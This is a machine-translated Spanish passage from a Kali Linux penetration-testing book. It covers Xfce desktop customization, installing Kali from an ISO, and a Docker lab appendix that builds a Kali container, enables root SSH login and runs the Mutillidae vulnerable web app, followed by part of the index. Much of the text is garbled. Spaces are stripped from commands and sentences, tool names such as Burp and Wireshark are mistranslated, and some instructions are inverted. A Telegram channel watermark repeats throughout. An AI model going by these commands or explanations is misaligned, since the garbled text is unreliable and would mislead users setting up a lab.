Google Figura A.21 KaliFileManager Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.22 Preferencias de FileManager panel lateral Las tabletas del panel lateral le permiten cambiar la configuración del panel lateral en el administrador de archivos. Principalmente, puede cambiar el tamaño de los iconos. Conducta La pestaña Comportamiento, que se muestra en la Figura A.23, le permite agregar o quitar algunos comportamientos en el administrador de archivos, y puede hacer lo siguiente: Definir un clic/doble clic para activar elementos Administrar comportamientos en la pestaña suave en lugar de la nueva ventana Agregue la acción de eliminación permanente en el menú contextual Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.23 Comportamiento del administrador de archivos Avanzado En la pestaña Avanzado, que se muestra en la Figura A.24, puede configurar aún más opciones relacionadas con Permisos de carpetas y Administración de volúmenes. Teclado El menú Teclado le permite administrar la configuración del teclado y le brinda la posibilidad de establecer accesos directos a las aplicaciones. Conducta La pestaña Comportamiento, que se muestra en la Figura A.25, le permite cambiar la configuración del comportamiento del teclado. Podrá cambiar los siguientes comportamientos del teclado: Habilitar/deshabilitar bloq num al inicio Habilitar/deshabilitar la repetición de teclas cuando descanse el dedo en el teclado Mostrar/ocultar cursor parpadeante Atajos de aplicaciones Canal de Telegram : @IRFaraExam Machine Translated by Google Los accesos directos de aplicaciones, que se muestran en la Figura A.26, son una excelente configuración. Le permiten configurar accesos directos de teclado para eliminar aplicaciones. Simplemente haga clic en Agregar para crear su propio acceso directo. Figura A.24 Configuración avanzada del administrador de archivos Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.25 Configuración del teclado En la Figura A.26, verá Ctrl+Alt+W, la combinación de teclado que creé para abrir el navegador web. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.26 Atajos de aplicación Diseño La pestaña Diseño es conveniente si desea utilizar varios tipos de teclados de idiomas. Editor de tipos MIME En la ventana Editor de tipos MIME, que se muestra en la Figura A.27 , puede modificar la aplicación predeterminada que está asociada con un tipo de archivo. Para cambiar el valor, haga doble clic en el elemento que desea editar. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.27 Editor de tipos MIME Ratón y panel táctil Puede usar las opciones de esta ventana, que se muestran en la Figura A.28, para administrar la configuración de la apariencia y el comportamiento del mouse. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.28 Configuración del ratón Estas son las principales tareas que puede realizar en esta ventana: En la pestaña Dispositivo, puede cambiar lo siguiente: Los botones del mouse (zurdos o diestros) La velocidad del puntero del mouse (aceleración y sensibilidad) En la pestaña Comportamiento, puede cambiar lo siguiente: El número de píxeles a mover antes del movimiento de arrastrar y soltar Eltiempodeduracióndedosclicsqueseconsideraundobleclic La distancia máxima para que se mueva el mouse antes de que se considere como un doble clic En la ficha Tema, puede cambiar lo siguiente: El aspecto del puntero del ratón (tema) Canal de Telegram : @IRFaraExam Machine Translated by Google tamaño del cursor Panel El panel, que se muestra en la Figura A.29 , es la barra de opciones que ve en su escritorio. En esta sección, aprenderá a personalizarlo. Más adelante en este apéndice, aprenderá a adaptar su propio panel al entorno de escritorio. Figura A.29 Barra superior Mostrar En la pestaña Pantalla, que se muestra en la Figura A.30 , puede administrar la configuración de pantalla del panel. Asegúrese de seleccionar el panel adecuado que desea personalizar de la lista desplegable superior (en nuestro ejemplo, estamos usando el Panel 1). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.30 Configuración del panel General: En esta sección, podrá hacer lo siguiente: EstablecerladirecciónenHorizontal,VerticaloBarradelescritorio Bloqueeelpanelparaevitararrastrarloporaccidente Hideiton-demandarsiempremostrar Reservespaceonborders Medidas: En este apartado se puede manipular el tamaño del panel. Tenga en cuenta que la altura del panel (panel vertical) o el ancho (panel horizontal) es igual al número de filas multiplicado por el tamaño de fila. Apariencia En la pestaña Apariencia, que se muestra en la Figura A.31, podrá cambiar la apariencia de su panel de escritorio Kalides. Puede hacer lo siguiente: Establecerelestilodefondo Ajustarlosiconosautomáticamente Cambiar su opacidad Figura A.31 Configuración de apariencia del panel Elementos Canal de Telegram : @IRFaraExam Machine Translated by Google En la pestaña Elementos, que se muestra en la Figura A.32 , tiene la opción de administrar los elementos dentro de su panel. Puede agregar, quitar o cambiar las posiciones de los iconos/elementos que pertenecen a su panel. espacios de trabajo La ventana Espacios de trabajo, que se muestra en la Figura A.33, le ofrece opciones para hacer lo siguiente: Cambiar el número de espacios de trabajo Renombrar un espacio de trabajo Establecerelmargenparasuespaciodetrabajo Figura A.32 Posición de los elementos del panel Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.33 Espacios de trabajo Administrador de ventanas En la ventana Administrador de ventanas, que se muestra en la Figura A.34, puede configurar el aspecto de la ventana, los atajos de teclado y mucho más. Figura A.34 Administrador de ventanas Canal de Telegram : @IRFaraExam Machine Translated by Google Estilo En la pestaña Estilo, puede configurar el aspecto de las ventanas abiertas en su Kali Linux. Esta es la lista de tareas que puede realizar en esta pestaña: Cambiar el tema en la lista de la sección derecha Cambiar la fuente del título y la alineación Cambiar el diseño de los botones Teclado En la pestaña Teclado, que se muestra en la Figura A.35, puede cambiar los accesos directos del teclado para manejar ventanas (por ejemplo, minimizar, maximizar, etc.). Enfocar La pestaña Enfoque, que se muestra en la Figura A.36, es difícil de entender. Simplemente, una ventana enfocada recibirá la entrada del mouse o del teclado . Lasiguientelistadeconfiguracionesquepuedeadministrarenestapestaña: Cuando seleccione Hacer clic para enfocar, la ventana se enfocará cuando haga clic en cualquier parte de su marco. Cuando selecciona Enfocar sigue al mouse, la ventana se enfocará cuando pase el mouse sobre su marco. Dar Foco Automáticamente A Una Ventana Recién Abierta Habilidad Para Apilar La Ventana Enfocada En La Parte Superior De Todas Las Abiertas Establezca Elevar Al Hacer Clic Para Levantar Su Ventana Sobre Las Otras Al Hacer Clic En Su Marco. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.35 Métodos abreviados de teclado de Windows Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.36 Ajustes de enfoque de ventana Ejemplo práctico de personalización de escritorio Todas estas configuraciones son abrumadoras a primera vista, pero el siguiente ejercicio le permitirá practicar con las configuraciones y llevar su escritorio Kali Xfcede al siguiente nivel. La idea de este ejercicio es darle una idea de lo que puede hacer con este entorno excepcional. Las siguientes son las tareas que va a realizar: Editarelpanelsuperior Agregue un segundo panel que contenga nuestras aplicaciones favoritas Cambiar el aspecto del escritorio EditarelPanelSuperior Antes de comenzar a editar el panel, tenga en cuenta que los cambios que aplica son opcionales. Puede decidir cuáles son las opciones correctas para el aspecto de su entorno Kalien. Quitar iconos Primero, elimine todos los íconos de aplicaciones en la barra superior para que pueda crear otro en la parte inferior dedicado a las aplicaciones (como un MaciOS). Abra Configuración, luego vaya a Panel ÿ Elementos, como se muestra anteriormente en la Figura A.32. Elimine algunos elementos de la lista seleccionándolos y haciendo clic en el icono menos en el lado derecho de la ventana de la pestaña. No haga clic en el botón menos en la parte superior derecha; éste eliminará todo el panel. EliminarShowDesktop. RemoveDirectoryMenu. Quite los dos elementos de lanzamiento debajo del elemento de menú de directorio. Quite dos de los cuatro elementos Separadores (debajo del elemento Menú Bigotes). La figura A.37 muestra los resultados. La Figura A.38 muestra cómo se verá el panel superior después de implementar esos cambios. Adición de un nuevo panel inferior Canal de Telegram : @IRFaraExam Machine Translated by Google A continuación, creará otro panel dedicado a los accesos directos de aplicaciones. Puede elegir las aplicaciones que desee, pero para este ejercicio agregará accesos directos a los siguientes: Administrador de archivos Nmap Eructar Ventana de terminal metasploit editor de texto navegador web Tiburón alambre Búsquedasploit Figura A.37 Configuración del panel Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.38 Cambios en el panel superior Adición de panel Para crear un nuevo panel, abra Configuración ÿ Panel y haga clic en el ícono más cerca del panel seleccionado, que en este caso es el Panel 1 (Figura A.39). Figura A.39 AgregandoPanel Una vez que haga clic en el icono más, aparecerá un nuevo panel pequeño. Arrástrelo hasta la parte inferior de la pantalla. Es importante tener en cuenta que debe centrarlo manualmente en el centro de la pantalla. A continuación, configure el Panel 2 con los ajustes que se muestran en la Figura A.40. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.40 Configuración del nuevo panel Empecemos a agregar los accesos directos. Todo esto, simplemente abra el menú y busque la aplicación que desea agregar, luego haga clic con el botón derecho y seleccione Agregar al panel, como se muestra con el editor de texto en la Figura A.41. Figura A.41 Agregar al panel Canal de Telegram : @IRFaraExam Machine Translated by Google Siga el mismo procedimiento para todas las demás aplicaciones enumeradas anteriormente. La Figura A.42 muestra el resultado final. Figura A.42 Resultados finales Cambiarelaspectodelescritorio Puede acceder a la configuración de su escritorio (oa cualquier otro módulo como el panel, el menú, etc.) haciendo clic con el botón secundario en el escritorio y seleccionando Configuración del escritorio en el menú, como se muestra en la Figura A.43. Este es un acceso directo rápido y fácil en lugar de abrir el menú y hacer clic en el acceso directo de Configuración. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.43 Configuración de escritorio CambioEscritorioFondo Después de abrir la ventana Configuración de escritorio, vaya a la pestaña Fondo para cambiar la imagen de fondo . Seleccione la última piedra en la lista (Figura A.44). Figura A.44 Fondo de escritorio Cambiar iconos de escritorio Haga clic en la pestaña Iconos (en la ventana Configuración de escritorio) para realizar los dos cambios siguientes, que se muestran en la Figura A.45: Establezca el tamaño de fuente de los iconos en 58. Quite el icono del sistema de archivos del escritorio. Canal de Telegram : @IRFaraExam Machine Translated by Google La Figura A.46 muestra el hermoso aspecto de su nuevo escritorio. Instalación de KaliLinux desde cero Anteriormente, aprendió a instalar una copia de máquina virtual preempaquetada de KaliLinux, por lo que puede seguir este apéndice. Pero supongamos que tiene una PC dedicada, como una computadora portátil, y desea instalar Kali Linux como sistema operativo principal. Necesitará una imagen ISO de Kali Linux para realizar el trabajo. Por supuesto, también puede usar un ISO para instalar un hipervisor Kaliona (p. ej., VMware, VirtualBox o Hyper-V). Eso es lo que hago personalmente cuando quiero experimentar con el nuevo proceso de instalación de cada versión de Kali Linux. Figura A.45 Configuración de iconos Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.46 Desktop New Look La primera ventana que ve al instalar el sistema operativo Kali Linux desde cero es el menú de inicio. En esta pantalla, elija Instalación gráfica (Figura A.47) de la lista y presione Enter en su teclado. Figura A.47 Instalación gráfica A continuación, elija el idioma que desea usar para Kali Linux (para este ejercicio, seleccionaremos inglés, que se muestra en la Figura A.48), y después de esta pantalla, se le pedirá que elija la ubicación de su país (para este ejercicio, elegiremos Estados Unidos). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.48 Idioma Una vez que haya seleccionado su región, la imagen de Kali se copiará en su host (también sondeará su red) y luego se le permitirá ingresar un nombre de host para su Kali . Luego se le pedirá que ingrese el nombre de dominio. Deje esta ventana vacía a menos que desee unirse a un dominio. A continuación, se le pedirá que ingrese su nombre completo, como se muestra en la Figura A.50, y en el siguiente paso, se le pedirá que ingrese la cuenta con privilegios bajos nombre de usuario. Después de configurar el nombre de usuario, se le pedirá que ingrese su contraseña dos veces para asegurarse de que no cometió ningún error en esta etapa (Figura A.51). Siguiendo la contraseña, configurará el reloj y la zona horaria del país donde vive. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.49 Nombre de host Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.50 UserFullName Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.51 Contraseña de usuario A continuación, comenzará a crear particiones en los discos y, en este ejercicio, elija la opción Guiado: Usar todo el disco, como se muestra en la Figura A.52. Si desea instalar Kali en una computadora portátil de producción, entonces debe seleccionar la opción Guiada: usar todo el disco y configurar LVM cifrado. Luego, seleccione el disco que desea particionar (Figura A.53). Aún no hemos terminado con el particionamiento del disco. En el siguiente paso, se le pedirá que elija el esquema para su partición. Yo siempre elijo Todos los archivos en una partición (Figura A.54), pero si desea seleccionar una partición separada, no dude en hacerlo. En esta etapa, podrá ver la partición de su disco de partición antes de comenzar a cambiar el disco (Figura A.55). Una vez que haya terminado de escribir este cambio en la partición, se le pedirá que instale el software (Figura A.56). Las opciones predeterminadas son Canal de Telegram : @IRFaraExam Machine Translated by Google excelente sin ningún cambio, pero siéntete libre de hacer tus propias elecciones. Luego, si está instalando Kali Linux como su sistema operativo principal en una computadora (o VM), entonces deberá habilitar el cargador de arranque GRUB (Figura A.57). Figura A.52 Discos de partición Paso 1 Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.53 Discos de partición Paso 2 Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.54 Discos de partición Paso 3 Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.55 PartitionDisksFinalStep Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.56 Selección de software Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.57 GRUBLoader La pantalla final mostrará que la instalación se ha completado (Figura A.58) . Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.58 Realización de la instalación Resumen La suposición es que usted descargó una copia de máquina virtual de Kali Linux y comenzó a practicar los ejercicios en este apéndice. Idealmente, disfrutó de leerlo y aprendió algo nuevo. Canal de Telegram : @IRFaraExam Machine Translated by Google APÉNDICE B BuildingaLabEnvironmentUsingDocker En el Apéndice A, aprendió cómo instalar Kali desde cero usando un archivo ISO. Este tipo de instalación es típica para un host de producción en el que instala Kalito y lo usa con compromisos de prueba de penetración real. Aquí profundizaremos en Docker y verá cómo funcionan las imágenes y los contenedores en la práctica. Los contenedores Docker son nuevos para algunas personas, así que aproveche este apéndice para aprender cómo funciona practicando los ejercicios. Verá algunos escenarios prácticos que le ayudarán a manejar los contenedores Docker. No se preocupe, al final de este apéndice comenzará a usar Docker como un profesional. En este apéndice, obtendrá información sobre lo siguiente: Administración de imágenes en Docker Creación de contenedores Docker Descripción de las redes y los volúmenes de Docker Practicar con un entorno Docker virtual DockerTecnología La figura B.1 muestra algunos comandos de Docker. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura B.1 Comandos de Docker Conceptos básicos de Docker Dockerissimilarto (butnotthesameas!) Ahypervisor.Theprincipal componentisaDockerimage.Forexample, theKaliLinuximageislikeanISO filebutwithoutanoperatingsystem.You'lldownloadyourimagefromDocker Hub, andthenyoucanuseittocreatecontainers.What'sinterestingaboutthis conceptisthatyoudon'thavetoinstallanoperatingsystemtorunit; itusesthe Hostos (whereDockerisinstalled) torunthecontainers.Forexample, ifyou haveawebapplication, youcangetanApacheimageforrunningthewebserver (insideacontainer) andanotherMySQLimagetorunthedatabaseinsidea contenedor (ver FigureB .2). DockerInstalación Usaremos una máquina virtual de host de escritorio Ubuntu para instalar Docker. No uso Kali Linux como host para Docker, pero puede hacerlo en caso de que no quiera usar Ubuntu: ubuntu:~$sudoaptupdate&&sudoaptinstalldocker.io-y ¡Eso es todo! Ahora está listo para comenzar a usar Docker (después de que se complete la instalación). A continuación, cambiaremos al usuario raíz para interactuar con la línea de comandos de Docker . $sudousermod-aGdocker[nombre de usuario] Canal de Telegram : @IRFaraExam Machine Translated by Google Figura B.2 Ejemplo de DockerContainer Además, puede iniciar/detener Docker manualmente mediante los siguientes comandos: $serviciodockerstart $serviciodockerstop ¿Por qué usamos Docker de todos modos? ¿No podemos usar simplemente una máquina virtual? La respuesta simple es que los contenedores de Docker son livianos en comparación con las máquinas virtuales. Canal de Telegram : @IRFaraExam Machine Translated by Google elaborará más sobre imágenes y contenedores en las próximas secciones). La integración continua/implementación continua de automatización de canalización (CI/ CD) se puede realizar utilizando un orquestador como Jenkins o TFS (aquí es donde un DevOp guardará sus comandos de Docker). Imágenes y registros Las imágenes de Docker son como archivos ISO pero no iguales (solo las estamos comparando para que pueda entender el concepto, pero son diferentes). Puede descargar (extraer) imágenes del repositorio de Docker Hub ubicado en hub.docker.com/ . Para usar DockerHub, puede descargar imágenes sin crear una cuenta. Las imágenes tienen un sistema de archivos mínimo; empecemos a practicar descargando una imagen Docker de Kali Linux: root@ubuntu:~#dockerpullkalilinux/kali A continuación, revisemos las imágenes descargadas actualmente en nuestro host: root@ubuntu:~#dockerimages Si tiene curiosidad y desea consultar las imágenes de Kali en Docker Hub, puede visitar su repositorio en hub.docker.com/u/kalilinux. Fácil, ¿verdad? Ahora estamos listos para usar nuestro contenedor usando la imagen que acabamos de descargar. Antes de pasar al tema de los contenedores, aquí hay una lista rápida de cómo administrar sus imágenes: #Parabuscarunaimagenenelregistro $dockersearch[ImageName] #Paradescargarunaimagendesdeunregistro $dockerpull[ImageName] #Paracargarunaimagenaunregistro $dockerpush[nombre de usuario/Nombre de la imagen] #Tolistthelocalhostimages $dockerimages #Paraeliminarunaimagenenelhost $dockerrmi[ImageName] Canal de Telegram : @IRFaraExam Machine Translated by Google Contenedores Ahora que hemos descargado la imagen en nuestra VM de Ubuntu, el siguiente paso es ejecutarla: root@ubuntu:~#dockerrun-itd-namekali_016820b888e0ab ÿi :Modo interactivo;mantendrá el testdinabierto -t :Willallocatea pseudo-tty ÿd :modo separado;ejecutará el contenedor en segundo plano ÿÿname :Proporcione el nombre de su contenedor Es importante comprender que puede ejecutar tantos contenedores como desee desde la misma imagen de Docker (igual que las máquinas virtuales donde puede tener varios desde la misma imagen ISO). A continuación, verifiquemos la información del contenedor en ejecución: root@ubuntu:~#dockerps-a ¡Muy bien! Según el estado, el contenedor está en funcionamiento. Ahora es el momento de comenzar a interactuar con el Kalicontainer usando el comando exec : root@ubuntu:~#dockerexec-itkali_o1/bin/bash root@4897450e4598:/ #uname-a Linux4897450e45984.15.0-91-generic#92-UbuntuSMP PROPINA Sugerencia: para salir del contenedor y volver a la sesión del terminal host, simplemente escriba el comando de salida . Hemos iniciado sesión como usuario raíz y el sistema operativo utilizado para este contenedor está basado en Ubuntu porque el contenedor comparte el sistema operativo host (que es Ubuntu). root@4897450e4598:/#msfconsole bash:msfconsole:comando no encontrado Los contenedores Docker son muy livianos (memoria/CPU/consumo de disco) para el Canal de Telegram : @IRFaraExam Machine Translated by Google sistema host. Para visualizar los consumos, puede ejecutar htop o el siguiente comando ps : $ps-aux|grepDocker ParainstalarlasherramientasnecesariasenelcontenedorKalicon,puedeejecutarelsiguientecomando root@4897450e4598:/#apt-getinstall-y\ >nmap\ >metasploitframework\ >sqlmap\ >gobuster\ >listas de palabras\ >nano\ >nfs-common\ >cifs-utils\ >git\ >&&apt-getclean PROPINA El \ al final de cada línea significa que el comando continuará en la línea siguiente, o bien se tratará como un retorno de carro. Dockerfile ¡Hay buenas noticias! Puede crear su propia imagen y preinstalar todas las herramientas en lugar de hacerlo manualmente cada vez. Para hacer el trabajo, debe crear un archivo y darle el nombre docker file sin extensión. #KaliLinuxImagenBase DESDEkalilinux/kali #Actualizar+Actualizar RUNaptupdate&&aptupgrade-y #Instalar herramientas RUNapt-getinstall-y\ nmap\ metasploit-framework\ sqlmap\ gobuster\ Canal de Telegram : @IRFaraExam Machine Translated by Google listas de palabras\ nano\ nfs-common\ cifs-utils\ git\ &&apt-getclean #GetseclistfromGitHubandsaveitinthe/optfolder RUNgitclonehttps://github.com/ danielmiessler/SecLists.git/opt/seclists #SetworkingDir WORKDIR/root/ A continuación, construimos la imagen usando el archivo docker anterior (en el siguiente código, el punto al final significa que el archivo docker está en el mismo directorio actual): root@ubuntu:/home/gus/Documents#ls dockerfile root@ubuntu:/home/gus/Documents#dockerbuildtkali_custom. Después de compilar todos los paquetes, se creará una nueva imagen localmente en su máquina host: root@ubuntu:/home/gus/Documentos#dockerimages Tome nota del tamaño de la nueva imagen en comparación con la original del registro de Kali. Volúmenes No hemos hablado sobre el almacenamiento de datos hasta ahora. En la tecnología Docker, usamos volúmenes para guardar datos. El contenedor que se inició anteriormente sellará todos los datos una vez que el contenedor se detenga. root@ubuntu:/home/gus/Documentos#dockerrun-itd-namekali_03-v/home/gus:/ roota4000ah7777 Todo lo que necesitábamos hacer en el comando anterior para agregar la opción ÿv (v significa volumen) al comando de ejecución . Después, definiremos que el directorio de inicio en el host de Ubuntu— /home/gus— se asignará a la carpeta /root dentro del contenedor. Ahora, si accedemos al contenedor de Kali, veremos el mismo contenido en el directorio de inicio que el directorio de inicio de gus en el host de Ubuntu: root@ubuntu:/home/gus/Documentos#dockerexec-itkali_03/bin/bash Canal de Telegram : @IRFaraExam Machine Translated by Google Redes ¿Cómo puede encontrar la dirección IP de su contenedor? Tenemos varios contenedores ejecutándose en este momento; elegiremos el Kali_03 como ejemplo . root@ubuntu:/home/gus/Documents#dockerinspectKali_03|grepIPAddress root@ubuntu:/home/gus/Documents#dockerinspect-f"{{.NetworkSettings.IPAddress}}"kali_03 No se puede acceder directamente a esta subred desde nuestra máquina anfitriona Ubuntu; es por eso que necesitamos usar la ÿp (que significa puertos) para acceder a los contenedores especificando primero los puertos abiertos. Por ejemplo, si desea acceder a Kalius mediante SSH, debe especificar el puerto cuando ejecuta el comando de ejecución mediante la opción ÿp . En el siguiente comando, le decimos a Docker que queremos usar el puerto 2222 en el host para acceder a SSH en Kali. Además, tenga en cuenta que estamos usando la imagen kali_custom que creamos anteriormente: root@ubuntu:/home/gus/Documentos#dockerrun-itd-namekali_04-p2222:22kali_custom En esta etapa, necesitamos instalar el servidor SSH dentro del contenedor Kalicon porque no está instalado de manera predeterminada: root@ubuntu:/home/gus/Documentos#dockerexec-itkali_04/bin/bash A continuación, establezca una contraseña para su cuenta de Kaliroot: root@48394888f:~#passwdroot El paso final es permitir que el usuario root use SSH. Para que esto funcione, necesitaremos cambiar el archivo de configuración de SSH /etc/ssh/sshd_config y asegurarnos de agregar la línea Permit RootLoginyes . Y no olvide reiniciar el servidor SSH después de guardar el archivo de configuración SSH: root@48394888f:~#nano/etc/ssh/sshd_config Ahora podemos usar SSH (desde cualquier host en la red) para iniciar sesión de forma remota en el Kalicocontainer: Canal de Telegram : @IRFaraExam Machine Translated by Google gus@ubuntu:~$sshroot@localhost-p2222 ¿Se pregunta cómo obtuvo el contenedor Kali su dirección IP? La respuesta simple es que Docker usa un modo puente para asignar direcciones IP. root@ubuntu:~#dockernetworkinspectbridge MutillidaeDockerContainer No necesitamos una máquina virtual completa solo para ejecutar una aplicación web (es un desperdicio de recursos), ¿verdad? Los contenedores Docker son útiles para tales situaciones. Primero, descargue la imagen desde DockerHub a su host local de Ubuntu: root@ubuntu:~#dockerpullcitizenstig/nowasp En segundo lugar, ejecute el contenedor. Por cierto, podríamos haber ignorado el primer paso anterior y ejecutar el comando ejecutar en su lugar. El comando ejecutar verificará si tiene una copia local de la imagen; si no, la descargará automáticamente desde DockerHub: root@ubuntu:~#dockerrun-itd-p8080:80–namemutillidae_01citizenstig/nowasp Usamos la opción ÿp para decirle a Docker que se accederá al contenedor mediante el puerto 8080 desde el host de Ubuntu (en otras palabras, el puerto 80 del contenedor se asignará al puerto 8080 en el . host) . A continuación, se le pedirá que configure la base de datos (consulte la Figura B.3) y, después de eso, el sitio debería estar en funcionamiento. ¡ Y listo! (ver Figura B.4). Ahora tiene un laboratorio vivo listo para ser explotado en menos de un minuto. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura B.3 MutillidaeDBInit Figura B.4 Página de inicio de Mutillidae Resumen Docker es un gran invento para crear entornos y servicios virtuales rápidamente. Lo que ha aprendido en este apéndice son los escenarios prácticos de esta tecnología. Por supuesto, hay muchas cosas que no cubre, pero si practicó los ejercicios, seguramente podrá comenzar a usar Docker usted mismo. Cuando comencemos los ataques de prueba de penetración, verá una vez más cómo explotar los contenedores Docker, pero primero debe comprender los fundamentos que cubrimos en este capítulo. Canal de Telegram : @IRFaraExam Machine Translated by Google Índice A ÿuna orden, 15 listas de control de acceso (ACL), 286 Hashes de ActiveDirectory, 310 Protocolo de resolución de direcciones (ARP), 68–69, 73 modos de direccionamiento, 361 Adyacente (A), en CVSS, 347 Estándar de cifrado avanzado (AES), 326–328 fase de enumeración avanzada sobre, 125–126 Protocolos CI/CD, 143–151 protocolos de base de datos, 142–143 protocolos de intercambio de archivos, 154– 158 protocolos de comunicación remota gráfica, 152– 154 protocolos de transferencia, 126–142 Protocolos web 80/443 , 151 Ventana AdvancedNetworkConfiguration(KaliXfceDesktop), 435–436 advancedscriptingscan, 128–129, 131–132, 136 Pestaña avanzada (KaliXfceDesktop), 442, 445 anacrontab,266 Fase de análisis/arquitectura (SDLC), 251–252 Instalación de ApacheWebServer, 200 Ficha Apariencia (KaliXfceDesktop), 436, 450 Pestaña de accesos directos de aplicaciones (KaliXfceDesktop), 446–447 Canal de Telegram : @IRFaraExam Machine Translated by Google modelado de amenazas de aplicaciones, 251 comando aptinstall , 41 comando aptÿcacheshow , 40–41 arquitectura (Windows), 275 argumentos, 84, 395, 401–402 operadores aritméticos, 397 comando arp-scan , 73 lenguaje ensamblador e ingeniería inversa sobre, 353 modos de direccionamiento, 361 instrucciones de montaje, 358–360 Registros de CPU, 353–357 tipos de datos, 360 segmentos de memoria, 361 ejemplo de ingeniería inversa, 361–367 activos, 251–252 cifrado asimétrico, 328–331 Complejidad de ataque (AC), en CVSS, 347 modos de ataque, 336–343 Vector de ataque (AV), en CVSS, 346–347 scripts automatizados , 270–271 análisis de vulnerabilidades automatizado, 237–238 Disponibilidad (A), en CVSS, 348 comando awk , 27–28 B Ficha de fondo (KaliXfceDesktop), 439–440 bashscripting Canal de Telegram : @IRFaraExam Machine Translated by Google sobre, 49–50 básico, 50 condiciones, 57–62 funciones, 56–57 bucles, 57–62 imprimiendo en la pantalla, 50–52 parámetros de guión, 54–56 entrada del usuario, 56 variables, 52–54 Bashshell, 193 apaleamientoramataque, 240 Ficha de comportamiento (KaliXfceDesktop), 445–446 pruebas comparativas, 332–334 directorio /bin , 2 encuadernación, 111–112 /bootdirectory,2 ataques de fuerza bruta sobre, 129–130 avanzado, 133–134 con Hydra, 136, 150–151 máscara y, 339–342 Cuentas de correo electrónico POP3, 141–142 Protocolo de escritorio remoto (RDP), 152–153 PYME, 156–157 SSH con Hydra, 132 Portales web usando Hydra , 147–151 etapa de fuerza bruta, 423–424 Canal de Telegram : @IRFaraExam Machine Translated by Google tamaño de búfer, desbordamiento de pila y, 382–383 búfer/desbordamiento de pila sobre, 369 fundamentos de, 369–378 análisis de búfer con Immunity Debugger, 372–376 Ejemplo de programa, 371–372 Instrucción POP, 371 PUSHinstrucción, 370–371 explotación de desbordamiento de pila , 378–388 mecanismos de desbordamiento de pila, 376–377 variables del conjunto de objetos integrados, 340–341 BurpExtendertab(BurpSuite), 241–244 BurpSuite sobre, 231 análisis automático de vulnerabilidades, 237–238 BurpExtendertab, 241–244 creación de informes, 244–245 elementos del sitio de enumeración, 236–237 Pestaña Intrusos, 239–241 apoderado, 234 Ficha repetidor, 238–239 ciclo de vida de desarrollo de software seguro (SDLC), 250–255 Ficha Objetivo, 234–236 Webenumeración y explotación, 231–250 Pruebas de penetración web, 232–245 C comando gato , 4, 13, 24, 28 Canal de Telegram : @IRFaraExam Machine Translated by Google exploración de categorías, 82–84 C/C++ ejemplo, 371–372 VisualStudio Codefor, 362–363 comando cd , 2, 23 Cambiado (C), en CVSS, 347 personajes, malos, 386–387 suma de control, 320 comando chmod , 18 Protocolos CI/CD sobre, 143 Portales web de fuerza bruta usando Hydra, 147–151 Ventana acoplable (Puerto 2375), 144–145 Jenkins (Puerto 8080/50000), 145–147 Enrutamiento entre dominios sin clases (CIDR), 69–70 comando claro , 4 cleartextinformation,sniffingfor, 180–183 CLI, 395 ataque en racimo, 240 refactorización de código, 417 carácter de colon(:), 15, 400 combinador, 337–338 inyección de comando, 217 comandos Vertambiéncomandosespecíficos base de datos ejecutiva, 210–215 ventana de terminal, 3–6 usuario, 10–13 Canal de Telegram : @IRFaraExam Machine Translated by Google comandosvariable, 54 comentarios, en Python, 393 Common Vulnerability Scoring System (CVSS), 346–349 operadores de comparación, 403–404 compresión, archivos, 21–22 condiciones, 57–62, 403 Confidencialidad(C),enCVSS, 347 conexiones establecido, 46–47 a acciones SMB, 196–197 constructores, 408 contenedores Estibador , 470–474 corriendo, 187 tipo de contenido, 227 control de EIP, 383–385 función de copia sobre escritura (COW), 258–261 Impacto central, 169 función de conteo , 399 portada, para informes, 350 comando cp , 19 registros de CPU sobre, 353–354 bandera, 357 general, 354–355 índice, 355 puntero, 355 Canal de Telegram : @IRFaraExam Machine Translated by Google segmento, 355–356 CrackMapExectotool, 310–312 gateando, 246 CRONjobsprivilegeescalation, 264–267 crontab, 265 falsificación de solicitud entre sitios (CSRF), 220–223 secuencias de comandos entre sitios (XSS) sobre, 203 explotando usando encabezado, 205–207 reflejado, 203–204 almacenado, 204–205 cryptographyandhashcracking about, 319 conceptos básicos de criptografía, 319–331 conceptos básicos de encriptación, 326–328 código autenticado de mensaje basado en hash (HMAC), 325 contraseñas hash, 323–325 Algoritmo de hash seguro (SHA), 323 utilizandoHashcat, 331–343 flujo de trabajo para el cracking de hash, 343 juegos de caracteres personalizados, 341–342 comando cortar , 27–28 D diagrama de flujo de datos, 252 tipos de datos, 360 protocolos de base de datos sobre, 142 Canal de Telegram : @IRFaraExam Machine Translated by Google MicrosoftSQLServer(Puerto1433), 142 MySQL (Puerto 3306), 143 Servidor de base de datos Oracle (Puerto 1521), 143 bases de datos instalación, 201–202 consultando, 208–210 configuración, 201–202 depuración de Pythonscripts, 391–392 defaultscript, 128 Ventana de escritorio (KaliXfceDesktop), 439 directorio /dev , 2 Fase de desarrollo (SDLC), 252–255 DevSecOps, 199 diccionario, 336–337, 400 resumen, 320 directorios, 23–24 dirtycowkernelexploit, 258–261 unidades de disco, listado, 276 Ficha de visualización (KaliXfceDesktop), 441–444, 449–450 mostrar archivos/carpetas, 15–16 Dmitry, 99 Envenenamiento por DNS, 46 Ventana acoplable (Puerto 2375) sobre, 144–145, 467 fundamentos de, 468 explotación, 185–190 hostexploitation, 188 Canal de Telegram : @IRFaraExam Machine Translated by Google instalación, 468–469 tecnología de, 